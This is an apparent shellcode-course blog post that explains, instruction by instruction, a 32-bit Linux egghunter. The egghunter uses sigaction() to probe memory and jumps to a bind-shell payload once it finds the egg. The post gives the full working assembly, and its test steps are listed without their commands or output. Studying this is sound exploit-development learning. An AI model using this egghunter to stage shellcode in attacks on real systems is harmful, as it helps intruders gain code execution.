Tuesday, March 15, 2016

3 - Egghunter Shellocde



One of the issues associated with shellcodes is the lack of space for storage. While with typical stack based buffer overflows the buffer size is usually big enough to hold the shellcode, however problems arise when there are not enough available consecutive memory locations to insert the shellcode. 

One technique to address this problem is to use certain parts of the VAS (Virtual Address Space) to which access is not always easy. To facilitate access to the shellcode one usual technique is the creation of a so called "egg", consisting of a number of easily identifiable pattern of bytes 

The "egg" is prepended to the shellcode, marking the beginning of it. Subsequently a program called "egghunter" would be created with the function of searching the "egg" until finding it. Once detected,  the flux of the program execution would jump to it, then running the shellcode

The "Egghunter" program should have the following characteristics:

1) robustness: since the search occurs in unallocated memory regions inside the VAS, there is a danger that the entire program fails if an improper dereference occurs. Therefore, the program must be enough robust to avoid runtime errors or segmentation fault.

2) small size: the program should occupy a small space to impact as less as possible on memory regions.

3) speed: the search process must be fast enough to not slow down the efficiency of the associated payload.

Regarding the "egg", the byte pattern must be unique and identifiable in the memory space, so that no collision with other byte strings occurs. For example, a set of repeated characters ensure uniqueness, as it would decrease the probability of existence of a similar pattern in the rest of the program. 

Also the "egg" should be easily executable and harmless, since the transfer of execution to the rest of shellcode (payload) must be produced simply and immediately. Although it would be possible to include an "offset" in the "egghunter" to prevent the execution of the "egg", this option is not considered advisable because it would result in an unnecessary increase in the size of the total shellcode.


- Basically, the "egghunter" program searchs inside memory addresses until finding the pattern of the "egg". Then, the memory address where the "egg" is located is loaded into the eip and the associated code is executed. -

- Let's examine step by step the program A3.nasm.

- The first two instructions are equivalent to setting 0x1000 value on ecx, which purpose is a page alignment on the pointer of the address to be validated (hold by ecx, as we see later). Page alignment means putting the data at a memory address equal to some multiple of the page size, which increases the system's performance due to the way the CPU handles memory. Page size is usually determined by processor architecture, being 4096 Bytes the smallest page size provided by the x86 platform.

- In the Ubuntu machine running this exercise:

root@lic:/# getconf PAGE_SIZE

- The OR logical operation with 0xfff outputs 0xfff (1111 1111 1111), because any bit OR-ed with 1 is 1.

or cx,0xfff

- Increasing 0xfff by 1 outputs 0x1000 = 4096 (PAGE_SIZE). In this way, ecx is incremented 16 Bytes every time this instruction is called, so that progressively all addresses are visited: 

inc ecx

- Why to divide this process into 2 operations instead of directly moving 0x1000 into ecx? The reason is that either instruction will be jumped distinctly, as seen from later instructions. Let's difference two cases:

i) If an invalid memory address is returned the first instruction will be jumped (label "alignment"). In this case the page alignment is necessary because it can be assumed that all addresses inside the page are also invalid. 

ii) If a valid memory address is returned the first instruction can be skipped (label "alignment"), , going directly to the second one (label "increment") and the pointer increased to the next valid address. This process would continue until the egg is found.

- Next, the sigaction() syscall is used to validate multiple addresses of the VAS at the same time, using the kernel's "verify-area" routine. In this way, every time an address is supplied the "verify-routine" ensures that there are 16 Bytes of contiguous memory to be validated.

root@lic:/# man sigaction

NAME    sigaction - examine and change a signal action
SYNOPSIS    int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);
DESCRIPTION   The sigaction() system call is used to change the action taken by a process on receipt of a specific signal. 
       - signum specifies the signal and can be any valid signal except SIGKILL and SIGSTOP.
       - If act is non-NULL, the new action for signal signum is installed from act.  
       - If oldact is non-NULL, the previous action is saved in oldact.
RETURN VALUE        sigaction() returns 0 on success; on error, -1 is returned, and errno is set to indicate the error.
ERRORS       EFAULT act or oldact points to memory which is not a valid part of the process address space.

- The identifier for sigaction() is 67=0x43:

root@lic:/usr/include/i386-linux-gnu/asm# cat unistd_32.h
#define __NR_sigaction 67

- According with the usual register layout for Linux IA-32, arguments for sigaction() must be located in these registers:

eax <- syscall identifier = 0x43
ebx <- signum
ecx <- act = pointer to the region of memory addresses to be validated 
edx <- oldact = saves the previous action

- sigaction() syscall is invoked:

xor eax,eax
mov al, 0x43
int 0x80

- Now, the pointed memory addresss by ecx must be validated. Linux System Errors is a set of codes returned when system requests fail. EFAULT error code is returned when a system call finds an invalid memory address, indicating that a the pointer provided to the system call was not valid. In this way, the Egghunter program can safely travel across the VAS without deferencing invalid memory regions. Because the return value of the sigaction() syscall has been sent to eax, the low part of eax register must be compared with the low byte of the error code EFAULT:

cmp al, 0xf2;

- In case of eax matching the EFAULT error code it means the address is invalid, and the process must start again jumping to the first label "alignment":

je alignment

- Otherwise, once ensured the memory address region is valid with no errors, the code of the "egg" is moved to eax in reverse order. The "egg" consists of 32 bytes, but is divided into two 16 Bytes segments to facilitate the later comparison of 16 Bytes memory address regions held by edi, as seen on next instruction. 

- About the content of the "egg" itself, it is recommended to be executable. For instance, let's take a series of instructions std (opcode 0xfd) and cld (opcode 0xfc). The effect of both instructions is nothing because eventually the direction flag is cleared:

mov eax, 0xfcfdfcfd

- Now, the actual address being searched, located in ecx, is moved to edi:

mov edi,ecx

- The assembly instruction scasd allows to compare two strings. The first string would be the content of the first word inside eax (first part of the "egg" code), and the second string would be the value of edi (memory address being searched), setting the flags accordingly. 


- In case of no matching the program jumps to label "increment" searching for the next memory address:

jnz increment

 - In case of matching the second word of the "egg" is compared:


- Again, in case of no matching, the program jumps to label "increment", searching for the next memory address:

jnz increment

- Eventually, when the two words of the code match, the "egg" is found. Then, the control of the program jumps unconditionally to the register edi, where is located the "egg" and the subsequent payload, and finally the shellcode is executed:

jmp edi

- The whole program A3.nasm:

global _start:
section .text

alignment:                 ; page alignment 
  or cx,0xfff
increment:                 ; next address
inc ecx
xor eax,eax
mov al, 0x43        ; sigaction() syscall
int 0x80
cmp al,0xf2               ; EFAULT error code
je alignment              ; jump in case of invalid address
mov eax,0xfcfdfcfd   ; loading the "egg" into eax
mov edi,ecx              ; loading the current address into edi
scasd                        ; comparing with the first word of "egg"
jnz increment            ; jump in case of no matching
scasd                        ; comparing with the second word of "egg"
jnz increment            ; jump in case of no matching
jmp edi                      ; in case of matching "egg", jump unconditionally to execute the "egg"
                                        ; and the rest of the shellcode


- Assembling and linking A3.nasm:

- Extracting the shellcode:

- For testing purposes, the Shell Bind TCP program from A1 will be used. Applying the shellcode extraction from A3.nasm to ShellcodeTest.c:

- Compiling ShellcodeTest.c:

- Executing ShellcodeTest.c:

- Using nc from other console, the execution of the Shell Bind TCP shellcode is successful: